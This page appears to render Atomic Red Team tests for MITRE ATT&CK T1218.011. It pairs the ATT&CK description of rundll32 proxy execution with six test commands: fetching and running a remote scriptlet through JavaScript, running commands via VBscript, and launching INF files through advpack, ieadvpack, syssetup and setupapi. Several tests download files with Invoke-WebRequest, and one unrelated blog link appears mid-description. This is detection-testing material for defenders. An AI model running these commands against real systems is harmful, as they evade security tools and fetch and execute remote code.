T1218.011
Signed Binary Proxy Execution: Rundll32
Description from ATT&CK
Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads (ex: <code>rundll32.exe {DLLname, DLLfunction}</code>).
Rundll32.exe can also be used to execute Control Panel Item files (.cpl) through the undocumented shell32.dll functions <code>Control_RunDLL</code> and <code>Control_RunDLLAsUser</code>. Double-clicking a .cpl file also causes rundll32.exe to execute. (Citation: Trend Micro CPL)
Rundll32 can also be used to execute scripts such as JavaScript. This can be done using a syntax similar to this: <code>rundll32.exe javascript:"..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https[:]//www[.]example[.]com/malicious.sct")"</code> This behavior has been seen used by malware such as Poweliks. (Citation: This is Security Command Line Confusion)
Adversaries may also attempt to obscure malicious code from analysis by abusing the manner in which rundll32.exe loads DLL function names. As part of Windows compatibility support for various character sets, rundll32.exe will first check for wide/Unicode then ANSI character-supported functions before loading the specified function (e.g., given the command <code>rundll32.exe ExampleDLL.dll, ExampleFunction</code>, rundll32.exe would first attempt to execute <code>ExampleFunctionW</code>, or failing that <code>ExampleFunctionA</code>, before loading <code>ExampleFunction</code>). Adversaries may therefore obscure malicious code by creating multiple identical exported function names and appending <code>W</code> and/or <code>A</code> to harmless ones.(Citation: Attackify Rundll32.exe Obscurity)(Citation: Github NoRunDll) DLL functions can also be exported and executed by an ordinal number (ex: <code>rundll32.exe file.dll,#1</code>).
Additionally, adversaries may use Masquerading techniques (such as changing DLL file names, file extensions, or function names) to further conceal execution of a malicious payload.(Citation: rundll32.exe defense evasion) https://www.aleksandrhovhannisyan.com/blog/how-to-add-a-copy-to-clipboard-button-to-your-jekyll-blog/
Atomic Tests
Atomic Test #1 - Rundll32 execute JavaScript Remote Payload With GetObject
Test execution of a remote script using rundll32.exe. Upon execution notepad.exe will be opened.
Supported Platforms: windows
auto_generated_guid: cf3bdb9a-dd11-4b6c-b0d0-9e22b68a71be
Inputs:
Name | Description | Type | Default Value |
---|---|---|---|
file_url | location of the payload | Url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.011/src/T1218.011.sct |
Attack Commands: Run with command_prompt!
1
2
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:#{file_url}").Exec();
Atomic Test #2 - Rundll32 execute VBscript command
Test execution of a command using rundll32.exe and VBscript in a similar manner to the JavaScript test. Technique documented by Hexacorn- http://www.hexacorn.com/blog/2019/10/29/rundll32-with-a-vbscript-protocol/ Upon execution calc.exe will be launched
Supported Platforms: windows
auto_generated_guid: 638730e7-7aed-43dc-bf8c-8117f805f5bb
Inputs:
Name | Description | Type | Default Value |
---|---|---|---|
command_to_execute | Command for rundll32.exe to execute | string | calc.exe |
Attack Commands: Run with command_prompt!
1
2
rundll32 vbscript:"\..\mshtml,RunHTMLApplication "+String(CreateObject("WScript.Shell").Run("#{command_to_execute}"),0)
Atomic Test #3 - Rundll32 advpack.dll Execution
Test execution of a command using rundll32.exe with advpack.dll. Reference: https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSLibraries/Advpack.yml Upon execution calc.exe will be launched
Supported Platforms: windows
auto_generated_guid: d91cae26-7fc1-457b-a854-34c8aad48c89
Inputs:
Name | Description | Type | Default Value |
---|---|---|---|
inf_to_execute | Local location of inf file | string | PathToAtomicsFolder\T1218.011\src\T1218.011.inf |
Attack Commands: Run with command_prompt!
1
2
rundll32.exe advpack.dll,LaunchINFSection #{inf_to_execute},DefaultInstall_SingleUser,1,
Dependencies: Run with powershell!
Description: Inf file must exist on disk at specified location (#{inf_to_execute})
Check Prereq Commands:
1
2
if (Test-Path #{inf_to_execute}) {exit 0} else {exit 1}
Get Prereq Commands:
1
2
3
New-Item -Type Directory (split-path #{inf_to_execute}) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.011/src/T1218.011.inf" -OutFile "#{inf_to_execute}"
Atomic Test #4 - Rundll32 ieadvpack.dll Execution
Test execution of a command using rundll32.exe with ieadvpack.dll. Upon execution calc.exe will be launched
Reference: https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSLibraries/Ieadvpack.yml
Supported Platforms: windows
auto_generated_guid: 5e46a58e-cbf6-45ef-a289-ed7754603df9
Inputs:
Name | Description | Type | Default Value |
---|---|---|---|
inf_to_execute | Local location of inf file | string | PathToAtomicsFolder\T1218.011\src\T1218.011.inf |
Attack Commands: Run with command_prompt!
1
2
rundll32.exe ieadvpack.dll,LaunchINFSection #{inf_to_execute},DefaultInstall_SingleUser,1,
Dependencies: Run with powershell!
Description: Inf file must exist on disk at specified location (#{inf_to_execute})
Check Prereq Commands:
1
2
if (Test-Path #{inf_to_execute}) {exit 0} else {exit 1}
Get Prereq Commands:
1
2
3
New-Item -Type Directory (split-path #{inf_to_execute}) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.011/src/T1218.011.inf" -OutFile "#{inf_to_execute}"
Atomic Test #5 - Rundll32 syssetup.dll Execution
Test execution of a command using rundll32.exe with syssetup.dll. Upon execution, a window saying "installation failed" will be opened
Reference: https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSLibraries/Syssetup.yml
Supported Platforms: windows
auto_generated_guid: 41fa324a-3946-401e-bbdd-d7991c628125
Inputs:
Name | Description | Type | Default Value |
---|---|---|---|
inf_to_execute | Local location of inf file | string | PathToAtomicsFolder\T1218.011\src\T1218.011_DefaultInstall.inf |
Attack Commands: Run with command_prompt!
1
2
rundll32.exe syssetup.dll,SetupInfObjectInstallAction DefaultInstall 128 .\#{inf_to_execute}
Dependencies: Run with powershell!
Description: Inf file must exist on disk at specified location (#{inf_to_execute})
Check Prereq Commands:
1
2
if (Test-Path #{inf_to_execute}) {exit 0} else {exit 1}
Get Prereq Commands:
1
2
3
New-Item -Type Directory (split-path #{inf_to_execute}) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.011/src/T1218.011_DefaultInstall.inf" -OutFile "#{inf_to_execute}"
Atomic Test #6 - Rundll32 setupapi.dll Execution
Test execution of a command using rundll32.exe with setupapi.dll. Upon execution, a windows saying "installation failed" will be opened
Reference: https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSLibraries/Setupapi.yml
Supported Platforms: windows
auto_generated_guid: 71d771cd-d6b3-4f34-bc76-a63d47a10b19
Inputs:
Name | Description | Type | Default Value |
---|---|---|---|
inf_to_execute | Local location of inf file | string | PathToAtomicsFolder\T1218.011\src\T1218.011_DefaultInstall.inf |
Attack Commands: Run with command_prompt!
1
2
rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 .\#{inf_to_execute}
Dependencies: Run with powershell!
Description: Inf file must exist on disk at specified location (#{inf_to_execute})
Check Prereq Commands:
1
2
if (Test-Path #{inf_to_execute}) {exit 0} else {exit 1}
Get Prereq Commands:
1
2
3
New-Item -Type Directory (split-path #{inf_to_execute}) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.011/src/T1218.011_DefaultInstall.inf" -OutFile "#{inf_to_execute}"